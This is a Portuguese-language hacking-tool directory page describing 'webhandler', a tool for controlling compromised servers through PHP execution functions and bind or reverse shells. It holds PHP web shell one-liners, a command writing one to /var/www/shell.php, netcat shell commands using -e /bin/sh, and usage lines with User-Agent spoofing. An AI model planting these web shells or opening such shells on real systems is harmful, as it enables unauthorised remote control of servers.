Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
webhandler — Simulador de Bash para controlar um servidor usando funções de sistema do PHP. | Kitploit
Ferramentas/GitHubGitHub/lnxg33k/webhandler
Geração de PayloadsEvasão de IDS/IPSExploração de Aplicações WebTestes de PenetraçãoComando e ControleFerramenta de Acesso Remoto
GitHublnxg33k/webhandler

webhandler

Simulador de Bash para controlar um servidor usando funções de sistema do PHP.

Ver Repositório
10024há 5 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

WebHandler


Um handler para funções de sistema do PHP e também um handler alternativo ao 'netcat' Minha imagem

Informações


O WebHandler tenta simular um 'prompt do bash do Linux' para manipular e processar:

root@kitploit:~
- Funções de execução de programas PHP _(por exemplo, `system`, `passthru`, `exec`, etc.)_
- Conexões de bind shell
- Conexões de reverse shell

Outro recurso é falsificar o campo "User-Agent" no cabeçalho HTTP. (--random-angent).

Ele também suporta proxies HTTP (--proxy http://<ip>:<port>)

  • O WebHandler funciona para requisições POST e GET:

    • <?php system($_GET['cmd']); ?>
    • <?php passthru($_REQUEST['cmd']); ?>
    • <?php echo exec($_POST['cmd']); ?>
  • O WebHandler é um substituto para conexões netcat.

    Um exemplo de conexão bind (por exemplo, nc -lvvp 1234 -e /bin/sh)

    Normalmente o usuário faria:

    • netcat -l -p 1234
    • nc -lvvp 1234

    Um exemplo de conexão reversa (por exemplo, nc 127.0.0.1 4321 -e /bin/sh)

    Normalmente o usuário faria:

    • netcat -l -p 4321
    • nc -lvvp 4321

Uso


  • --Exemplo de arquivo:

    • echo '<?php system($_GET['cmd']); ?>' > /var/www/shell.php
  • --url é um argumento obrigatório ao enviar requisições GET ou POST (por exemplo, uma conexão bind 'web based PHP'):

    • python webhandler.py --url http://www.mywebsite.com/shell.php?cmd=
    • python webhandler.py --url http://www.mywebsite.com/shell.php --method POST --parameter cmd
    • python webhandler.py -u http://www.mywebsite.com/shell.php?cmd= --random-agent --turbo
    • python webhandler.py -u http://www.mywebsite.com/shell.php?cmd= --proxy http://127.0.0.1:8080
  • --listen é um argumento obrigatório quando estiver aguardando uma conexão (por exemplo, uma conexão reversa 'raw'):

    • python webhandler.py --listen 1234

Dependências


Se a versão do seu Python < 2.7.x, então argparse é obrigatório Para instalá-lo, execute: sudo (apt-get|yum) install python-setuptools && sudo easy_install argparse OU sudo pip --install argparse.

readline é opcional. Este módulo é usado para fornecer recursos elaborados de edição de linha e histórico.

git é opcional. Isso permite que o projeto seja mantido atualizado.

Links


Wiki

Bugs Conhecidos

Baixar ferramenta